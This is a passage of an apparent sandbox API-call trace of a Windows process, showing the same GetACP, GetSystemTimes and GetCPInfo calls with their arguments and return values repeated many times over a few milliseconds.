GetACP () returned 0x4e4 [0081.246] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.246] GetACP () returned 0x4e4 [0081.246] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.246] GetACP () returned 0x4e4 [0081.246] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.246] GetACP () returned 0x4e4 [0081.246] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.246] GetACP () returned 0x4e4 [0081.246] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.246] GetACP () returned 0x4e4 [0081.246] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.247] GetACP () returned 0x4e4 [0081.247] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.247] GetACP () returned 0x4e4 [0081.247] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.247] GetACP () returned 0x4e4 [0081.247] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.247] GetACP () returned 0x4e4 [0081.247] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.247] GetACP () returned 0x4e4 [0081.247] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.247] GetACP () returned 0x4e4 [0081.247] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.247] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.247] GetACP () returned 0x4e4 [0081.247] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.248] GetACP () returned 0x4e4 [0081.248] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.248] GetACP () returned 0x4e4 [0081.248] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.248] GetACP () returned 0x4e4 [0081.248] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.248] GetACP () returned 0x4e4 [0081.248] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.248] GetACP () returned 0x4e4 [0081.248] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.248] GetACP () returned 0x4e4 [0081.248] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.248] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.249] GetACP () returned 0x4e4 [0081.249] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.249] GetACP () returned 0x4e4 [0081.249] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.249] GetACP () returned 0x4e4 [0081.249] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.249] GetACP () returned 0x4e4 [0081.249] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.249] GetACP () returned 0x4e4 [0081.249] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.249] GetACP () returned 0x4e4 [0081.249] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.249] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.249] GetACP () returned 0x4e4 [0081.249] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.250] GetACP () returned 0x4e4 [0081.250] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.250] GetACP () returned 0x4e4 [0081.250] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.250] GetACP () returned 0x4e4 [0081.250] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.250] GetACP () returned 0x4e4 [0081.250] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.250] GetACP () returned 0x4e4 [0081.250] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.250] GetACP () returned 0x4e4 [0081.250] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.250] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.251] GetACP () returned 0x4e4 [0081.251] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.251] GetACP () returned 0x4e4 [0081.251] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.251] GetACP () returned 0x4e4 [0081.251] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.251] GetACP () returned 0x4e4 [0081.251] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.251] GetACP () returned 0x4e4 [0081.251] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.251] GetACP () returned 0x4e4 [0081.251] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.251] GetACP () returned 0x4e4 [0081.251] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.251] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.252] GetACP () returned 0x4e4 [0081.252] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.252] GetACP () returned 0x4e4 [0081.252] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.252] GetACP () returned 0x4e4 [0081.252] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.252] GetACP () returned 0x4e4 [0081.252] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.252] GetACP () returned 0x4e4 [0081.252] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.252] GetACP () returned 0x4e4 [0081.252] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.252] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.252] GetACP () returned 0x4e4 [0081.252] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.253] GetACP () returned 0x4e4 [0081.253] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.253] GetACP () returned 0x4e4 [0081.253] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.253] GetACP () returned 0x4e4 [0081.253] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.253] GetACP () returned 0x4e4 [0081.253] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.253] GetACP () returned 0x4e4 [0081.253] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.253] GetACP () returned 0x4e4 [0081.253] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.253] GetACP () returned 0x4e4 [0081.253] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.253] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.253] GetACP () returned 0x4e4 [0081.254] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.254] GetACP () returned 0x4e4 [0081.254] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.254] GetACP () returned 0x4e4 [0081.254] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.254] GetACP () returned 0x4e4 [0081.254] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.254] GetACP () returned 0x4e4 [0081.254] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.254] GetACP () returned 0x4e4 [0081.254] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.254] GetACP () returned 0x4e4 [0081.254] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.254] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.254] GetACP () returned 0x4e4 [0081.254] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.255] GetACP () returned 0x4e4 [0081.255] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.255] GetACP () returned 0x4e4 [0081.255] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.255] GetACP () returned 0x4e4 [0081.255] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.255] GetACP () returned 0x4e4 [0081.255] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.255] GetACP () returned 0x4e4 [0081.255] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.255] GetACP () returned 0x4e4 [0081.255] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.255] GetACP () returned 0x4e4 [0081.255] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.255] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.256] GetACP () returned 0x4e4 [0081.256] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.256] GetACP () returned 0x4e4 [0081.256] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.256] GetACP () returned 0x4e4 [0081.256] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.256] GetACP () returned 0x4e4 [0081.256] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.256] GetACP () returned 0x4e4 [0081.256] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.256] GetACP () returned 0x4e4 [0081.256] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.256] GetACP () returned 0x4e4 [0081.256] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.256] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.256] GetACP () returned 0x4e4 [0081.257] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.257] GetACP () returned 0x4e4 [0081.257] 